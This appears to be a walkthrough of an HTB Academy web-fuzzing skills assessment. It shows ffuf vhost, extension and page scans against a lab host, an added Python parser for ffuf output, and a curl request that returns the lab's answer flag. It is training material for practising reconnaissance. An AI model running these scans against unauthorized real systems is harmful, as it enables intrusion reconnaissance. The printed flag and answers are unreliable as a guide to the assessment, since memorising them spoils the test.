Skills Assessment - Web Fuzzing

  1. Run a sub-domain/vhost fuzzing scan on '*.academy.htb' for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name)

sudo sh -c 'echo " 94.237.52.105 academy.htb " >> /etc/hosts'
$ ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:56405/ -H 'Host: FUZZ.academy.htb' -fs 985

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://academy.htb:56405/
 :: Wordlist         : FUZZ: /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.academy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 985
________________________________________________

test                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]
archive                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]
faculty                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6ms]
:: Progress: [4997/4997] :: Job [1/1] :: 645 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

  2. Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?

sudo sh -c 'echo " 94.237.52.105  academy.htb test.academy.htb archive.academy.htb faculty.academy.htb" >> /etc/hosts'
$ ffuf -w /usr/share/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:56405/indexFUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://faculty.academy.htb:56405/indexFUZZ
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/web-extensions.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.phps                   [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 3951ms]
.php7                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4959ms]
.php                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4961ms]
:: Progress: [39/39] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
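The two scans above rely on ffuf's default status matcher (`-mc 200-299,301,302,307,401,403,405,500`) and, in the vhost run, on `-fs 985` to drop the catch-all response that every unknown `Host:` name receives. The script below is an added example, not part of the original write-up or of ffuf itself: it parses ffuf result lines in the format printed above, derives the baseline body size from a run the same way you would eyeball it before choosing `-fs`, and re-applies the matcher and size filter. The `UNFILTERED_RUN` sample is constructed for the example (the three real vhost names are taken from the scan above; the `www`/`mail`/`ftp` lines are invented to stand in for the catch-all noise).

```python
"""Parse ffuf result lines and re-apply the matcher/filter logic the banner reports."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Set

# One ffuf result line, as printed in the scans above:
# "test                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]"
RESULT_RE = re.compile(
    r"^(?P<payload>\S+)\s+\[Status:\s*(?P<status>\d{3}),\s*Size:\s*(?P<size>\d+),"
    r"\s*Words:\s*(?P<words>\d+),\s*Lines:\s*(?P<lines>\d+),"
    r"\s*Duration:\s*(?P<ms>\d+)ms\]$"
)


@dataclass(frozen=True)
class Hit:
    payload: str
    status: int
    size: int
    words: int
    lines: int
    duration_ms: int


def parse_ffuf(output: str) -> List[Hit]:
    """Return the result lines of a raw ffuf run; banner and progress lines are skipped."""
    hits = []
    for line in output.splitlines():
        m = RESULT_RE.match(line.strip())
        if m:
            hits.append(Hit(m["payload"], int(m["status"]), int(m["size"]),
                            int(m["words"]), int(m["lines"]), int(m["ms"])))
    return hits


def parse_code_spec(spec: str) -> Set[int]:
    """Expand a ffuf-style code list such as '200-299,301,302' into a set of ints."""
    codes: Set[int] = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = part.split("-", 1)
            codes.update(range(int(lo), int(hi) + 1))
        else:
            codes.add(int(part))
    return codes


# ffuf's default matcher, exactly as the scan banners above report it.
DEFAULT_MATCHER = parse_code_spec("200-299,301,302,307,401,403,405,500")


def most_common_size(hits: Iterable[Hit]) -> int:
    """The body size that dominates a run. On a wildcard vhost this is the catch-all
    page every unknown Host name receives, i.e. the value you would pass to -fs."""
    counts = Counter(h.size for h in hits)
    return counts.most_common(1)[0][0]


def triage(hits: Iterable[Hit], match_codes: Set[int] = DEFAULT_MATCHER,
           filter_sizes: Iterable[int] = ()) -> List[str]:
    """Apply -mc style status matching and -fs style size filtering; return payloads."""
    excluded = set(filter_sizes)
    return [h.payload for h in hits
            if h.status in match_codes and h.size not in excluded]


# Constructed sample (not captured output): a vhost run *before* -fs is applied.
# Unknown names fall through to the default vhost (Size: 985); the real vhosts differ.
UNFILTERED_RUN = """\
www                     [Status: 200, Size: 985, Words: 423, Lines: 56, Duration: 9ms]
mail                    [Status: 200, Size: 985, Words: 423, Lines: 56, Duration: 7ms]
test                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]
ftp                     [Status: 200, Size: 985, Words: 423, Lines: 56, Duration: 8ms]
archive                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]
faculty                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6ms]
:: Progress: [4997/4997] :: Job [1/1] :: 645 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
"""


def vhosts_from_run(output: str) -> List[str]:
    """Derive the baseline size from the run itself and drop everything that matches it."""
    hits = parse_ffuf(output)
    return triage(hits, filter_sizes=[most_common_size(hits)])


if __name__ == "__main__":
    print(vhosts_from_run(UNFILTERED_RUN))  # ['test', 'archive', 'faculty']
```

The point of deriving the baseline from the run rather than hard-coding 985 is that the catch-all size changes from target to target; whatever body size the majority of candidates share is the noise, and the few responses that differ from it are the ones worth looking at.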

  3. One of the pages you identify should say 'You don't have access!'. What is the full page URL?

$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:56405/courses/FUZZ.php7

  4. Try to fuzz the parameters you identified for working values. One of them should return a flag. What is the content of the flag?

$ curl http://faculty.academy.htb:56405/courses/linux-security.php7 -X POST -d 'username=harry' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
<div class='center'><p>HTB{w3b_fuzz1n6_m4573r}</p></div>
<html>
<!DOCTYPE html>

<head>
  <title>HTB Academy</title>